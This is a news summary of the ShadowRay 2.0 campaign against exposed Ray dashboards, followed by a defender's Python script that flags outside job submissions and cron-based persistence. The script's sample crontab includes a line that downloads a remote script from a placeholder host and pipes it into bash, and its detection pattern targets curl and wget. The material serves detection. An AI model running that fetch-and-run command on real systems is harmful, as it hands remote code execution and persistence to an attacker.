ShadowRay 2.0 Exploits Unpatched Ray Flaw to Build Self-Spreading GPU Cryptomining Botnet
Briefly

"Oligo Security has warned of ongoing attacks exploiting a two-year-old security flaw in the Ray open-source artificial intelligence (AI) framework to turn infected clusters with NVIDIA GPUs into a self-replicating cryptocurrency mining botnet. The activity, codenamed ShadowRay 2.0, is an evolution of a prior wave that was observed between September 2023 and March 2024. The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig. The vulnerability has remained unpatched due to a "long-standing design decision" that's consistent with Ray's development best practices, which requires it to be run in an isolated network and act upon trusted code."
"The campaign involves submitting malicious jobs, with commands ranging from simple reconnaissance to complex multi-stage Bash and Python payloads, to an unauthenticated Ray Job Submission API ("/api/jobs/") on exposed dashboards. The compromised Ray clusters are then used in spray and pray attacks to distribute the payloads to other Ray dashboards, creating a worm that can essentially spread from one victim to another."
ShadowRay 2.0 leverages a missing authentication vulnerability (CVE-2023-48022, CVSS 9.8) in the Ray open-source AI framework to seize NVIDIA GPU clusters and run XMRig for illicit cryptocurrency mining. Attackers submit malicious jobs to an unauthenticated Ray Job Submission API to execute reconnaissance and multi-stage Bash/Python payloads, then pivot laterally to non-internet-facing nodes. Compromised clusters spray payloads to other exposed dashboards, enabling worm-like propagation. The campaign uses GitLab and GitHub repositories to host malware, adapts after takedowns, and establishes persistence via cron jobs that run every 15 minutes to pull updates and maintain access.
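As an added defender-side example (not code from Oligo's report or from the Ray project), the following Python flags the two behaviours the summary describes: job submissions to the Ray Job Submission API from outside an assumed trusted cluster network, and cron entries that run every 15 minutes and fetch content from the network. The access-log format, the addresses, the trusted range and the crontab text are all constructed assumptions, not indicators from the report.

```python
import ipaddress
import re
from typing import Iterable, List, Tuple

# Constructed sample lines in a common reverse-proxy access-log format, assumed to front the
# Ray dashboard (not real Ray logs). RFC 5737 addresses stand in for external sources.
SAMPLE_ACCESS_LOG = """\
10.0.1.15 - - [10/Nov/2025:09:12:01 +0000] "POST /api/jobs/ HTTP/1.1" 200 512
203.0.113.42 - - [10/Nov/2025:09:15:33 +0000] "POST /api/jobs/ HTTP/1.1" 200 498
10.0.1.15 - - [10/Nov/2025:09:16:07 +0000] "GET /api/jobs/raysubmit_abc123 HTTP/1.1" 200 301
198.51.100.7 - - [10/Nov/2025:09:20:44 +0000] "POST /api/jobs/ HTTP/1.1" 200 477
203.0.113.42 - - [10/Nov/2025:09:31:02 +0000] "GET /api/version HTTP/1.1" 200 88
"""

# Constructed crontab text; the URL is a placeholder, not an indicator from the report.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/15 * * * * curl -fsSL https://PLACEHOLDER.invalid/update.sh | bash
*/15 * * * * /usr/local/bin/metrics-push
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Ray is meant to run on an isolated network; only these ranges may submit jobs (assumed).
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]

def untrusted_job_submissions(lines: Iterable[str], trusted=TRUSTED_NETS) -> List[Tuple[str, str]]:
    """Return (timestamp, source IP) for job submissions (POST /api/jobs/) from outside trusted ranges."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m or m["method"] != "POST" or m["path"].rstrip("/") != "/api/jobs":
            continue
        src = ipaddress.ip_address(m["ip"])
        if not any(src in net for net in trusted):
            hits.append((m["ts"], m["ip"]))
    return hits

CRON_15_RE = re.compile(r"^\*/15(\s+\*){4}\s+(?P<cmd>.+)$")
FETCH_RE = re.compile(r"\b(curl|wget)\b")

def suspicious_cron_entries(crontab: str) -> List[str]:
    """Return commands scheduled every 15 minutes that fetch content over the network."""
    found = []
    for line in crontab.splitlines():
        m = CRON_15_RE.match(line.strip())
        if m and FETCH_RE.search(m["cmd"]):
            found.append(m["cmd"])
    return found
```

Any hit from the first check means the dashboard is reachable from outside the isolated network the Ray guidance assumes; the cron check is a starting point for a persistence sweep on nodes that show such hits.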
Read at The Hacker News